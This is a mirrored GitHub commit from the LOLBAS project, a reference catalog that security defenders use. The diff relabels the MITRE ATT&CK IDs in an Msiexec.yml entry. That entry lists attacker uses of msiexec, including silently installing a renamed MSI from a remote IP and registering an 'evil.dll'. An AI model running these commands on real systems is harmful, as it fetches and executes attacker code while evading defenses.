public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

MITRE ATT&CK realignment sprint

Browse Source
This commit is contained in:
Wietze
2021-11-05 18:58:26 +00:00
committed by GitHub
parent 97f5042a58
commit 4f7ec8d2af
159 changed files with 190 additions and 506 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
yml/OSBinaries/Msiexec.yml
View File

@@ -9,32 +9,28 @@ Commands:
Usecase: Execute custom made msi file with attack code
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to register the target DLL.
Usecase: Execute dll files
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to un-register the target DLL.
Usecase: Execute dll files
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\msiexec.exe